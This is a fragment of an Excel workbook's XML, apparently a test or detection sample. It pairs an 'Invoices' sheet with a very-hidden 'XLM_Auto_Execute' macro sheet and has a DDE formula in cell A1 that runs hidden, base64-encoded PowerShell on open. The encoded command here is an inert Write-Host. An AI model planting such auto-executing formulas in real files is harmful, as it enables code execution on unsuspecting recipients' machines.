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Invoices" sheetId="1" r:id="rId1"/>
    <sheet name="XLM_Auto_Execute" sheetId="2" state="veryHidden" type="macroSheet"/>
  </sheets>
</workbook>
</file>

<file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheetData>
    <row r="1">
      <c r="A1" t="str">
        <f>=cmd|'/c powershell -w hidden -enc V3JpdGUtSG9zdA=='!A0</f>
        <v>DDE Execution</v>
      </c>
    </row>
  </sheetData>
</worksheet>
</file>